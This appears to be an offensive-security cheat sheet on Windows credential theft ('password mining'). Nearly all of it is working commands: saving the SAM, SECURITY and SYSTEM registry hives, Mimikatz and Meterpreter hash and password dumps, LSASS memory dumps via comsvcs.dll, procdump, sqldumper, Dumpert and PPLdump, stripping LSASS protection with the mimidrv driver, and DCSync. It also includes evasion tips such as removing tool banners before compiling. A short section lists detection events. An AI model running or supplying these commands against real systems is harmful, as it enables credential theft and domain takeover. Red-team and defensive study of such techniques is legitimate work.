Password mining

Get the NetNTLMv1 hash of the current user: https://github.com/eladshamir/Internal-Monologue

Without admin rights

With admin rights

Windows Credential Management

Thread/Process → Token → Logon Session → Auth Package → Credential (optional)
Network logon (type 3): the client proves it has the credentials but does not send them to the server (creds are not in memory)
Non-network logon (Interactive/NetworkCleartext/…): the client sends credentials to the service (creds are in lsass.exe)

SAM

reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
lsadump::sam
load kiwi
lsa_dump_sam
use post/windows/gather/smart_hashdump
scanner/smb/impacket/secretsdump
impacket-secretsdump <admin>@<ip> -hashes <lm:nt>

Cache

lsadump::cache /system:system /sam:sam /security:security
run post/windows/gather/cachedump

LSASS

LSASS is protected
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL 
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL" 
Using Mimikatz

If LSASS is protected (Full WinTcb), try to add or remove process protection using Mimidrv. It requires SeLoadDriverPrivilege.

It starts a service using advapi32!ServiceCreate granting access to the service to Everyone group.

Windows Event ID 7045 & 4697 - Service Creation
- Service Name: “mimikatz driver (mimidrv)”
- Service File Name: *\mimidrv.sys
- Service Type: kernel mode driver (0x1)
- Service Start Type: auto start (2)

Event ID 4697 contains information about the account that loaded the driver. Audit Security System Extension must be configured via Group Policy for this event to be generated.

Sysmon Event ID 11 - File Creation
- TargetFilename: *\mimidrv.sys
Sysmon Event ID 6 - Driver Loaded
- ImageLoaded: *\mimidrv.sys
- SignatureStatus: Expired

!+
!processProtect /process:mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

Cleaning steps

!processprotect /process:lsass.exe
!-
PPLdump64
PPLdump64.exe -v lsass lass.dmp
LSASS is not protected
rundll32.exe comsvcs.dll, #24 "<PID> my.dmp full"
sqldumper.exe <PID> 0 0x0110

Remove banners before compilation: https://github.com/outflanknl/Dumpert
By default: C:\Windows\temp\dumpert.dmp

dumpert.exe
rundll32.exe dumpert.dll,Dump
procdump.exe -accepteula -ma lsass.exe dump.dmp
sekurlsa::minidump dump.dmp (offline)
sekurlsa::logonPasswords full (offline)
-----
sekurlsa::logonPasswords full
-----
lsadump::lsa /inject
lsadump::lsa /patch (/id:<account_id>)
lsadump::lsa /patch (/name:<account_name>)
use post/windows/gather/smart_hashdump
-----
load kiwi
creds_all
wce32.exe [-w]
fgdump [-u <user> -p <password> -h <ip>]

DCSync

lsadump::dcsync /user:<domain\user> /domain:<fqdn_domain> [/dc:<dc_name>]